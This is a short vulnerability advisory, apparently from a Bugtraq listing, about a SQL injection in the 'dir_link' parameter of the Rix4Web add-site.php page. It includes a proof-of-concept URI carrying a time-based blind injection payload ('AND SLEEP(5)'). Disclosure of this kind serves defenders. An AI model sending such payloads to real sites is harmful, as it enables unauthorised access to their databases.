Rix4Web 'dir_link' Parameter SQL Injection Vulnerability
BID:58132
Info
| Bugtraq ID: | 58132 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 23 2013 12:00AM |
| Updated: | Feb 23 2013 12:00AM |
| Credit: | L0n3ly-H34rT |
| Vulnerable: | Rix4Web Rix4Web 0 |
| Not Vulnerable: | |
Exploit / POC
Attackers can use a browser to exploit this issue.
The following exploit URI is available:
http://www.example.com/rix/add-site.php?do=addnew&go=addcat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.